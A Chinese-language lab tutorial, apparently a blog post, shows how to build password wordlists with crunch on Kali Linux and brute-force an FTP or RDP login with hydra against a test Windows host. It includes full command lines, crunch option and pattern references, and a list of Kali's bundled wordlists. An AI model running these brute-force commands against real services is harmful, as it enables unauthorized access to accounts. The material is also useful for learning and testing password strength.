本次实验应用kali(crunch创建 hydra工具进行破解)
一.本文仅限于学习,以下操作仅测试使用,切勿用于生产环境。
1.过程准备一台kali虚拟机,一台win(IP:192.168.174.135)(充当服务器)
2.在win上搭建ftp服务器(win用户名:administrator 密码:123456)
3.在kali的root模式下进行
4.先创建密码字典(结尾有更多crunch创建密码字典的用法)
完成一下6位数字密码字典的制作:
crunch 6 6 -f /usr/share/crunch/charset.lst numeric -s 111111 -o password.txt此时得到一个从111111-999999的密码字典命名为password.txt
5.使用密码字典password.txt进行爆破
hydra -l administrator -P password.txt ftp://192.168.174.135 //ftp协议用法hydra -l administrator -P pass123.txt 192.168.174.135 rdp //rdp是远程控制协议
crunch 是创建密码字典工具,按照指定的规则生成密码字典,可以根据情况灵活的生成字典
# crunch -help
crunch version 3.6
options
-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/etc/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-I 通常与-t联合使用,表明该字符为实义字符
-m 通常与-p搭配
-o 将密码保存到指定文件
-p 指定元素以组合的方式进行
-q 读取密码文件,即读取pass.txt
-r 定义重某一字符串重新开始
-s 指定一个开始的字符,即从自己定义的密码xxxx开始
-t 指定密码输出的格式
-u 禁止打印百分比(必须为最后一个选项)
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
特殊字符
% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字符
密码库
/usr/share/crunch/charset.lst
numeric 表示0123456789
Lalpha 表示26位小写字母
Ualpha 表示26位大写字母
例子:
(1)生成pass01-pass99所有数字组合
$ crunch 6 6 -t pass%% >>newpwd.txt(2)生成六位小写字母密码,其中前四位为pass
$ crunch 6 6 -t pass@@ >>newpwd.txt(3)生成六位密码,其中前四位为pass,后二位为大写
$ crunch 6 6 -t pass,, >>newpwd.txt(4)生成六位密码,其中前四位为pass,后二位为特殊字符
$ crunch 6 6 -t pass^^ >>newpwd.txt(5).制作8位数字字典
$ crunch 8 8 charset.lst numeric -o num8.dic(6)制作139开头的手机密码字典
$ crunch 11 11 +0123456789 -t 139%%%%%%%% -b 20mib -o START完成一下6位数字密码字典的制作:
crunch 6 6 -f /usr/share/crunch/charset.lst numeric -s 111111 -o password.txt二.KALI自带密码字典
在/use/share/wordlists目录下有许多自带的强大字典可以让我们去使用
| big.txt | 大的字典 |
| small.txt |
小的字典 |
| catala.txt | 项目配置字典 |
| common.txt |
公共字典 |
| euskera.txt | 数据目录字典 |
| others.txt | 扩展目录,默认用户名等字典 |
| indexes.txt | 首页字典 |
| 还有许多其他的查看百度 | |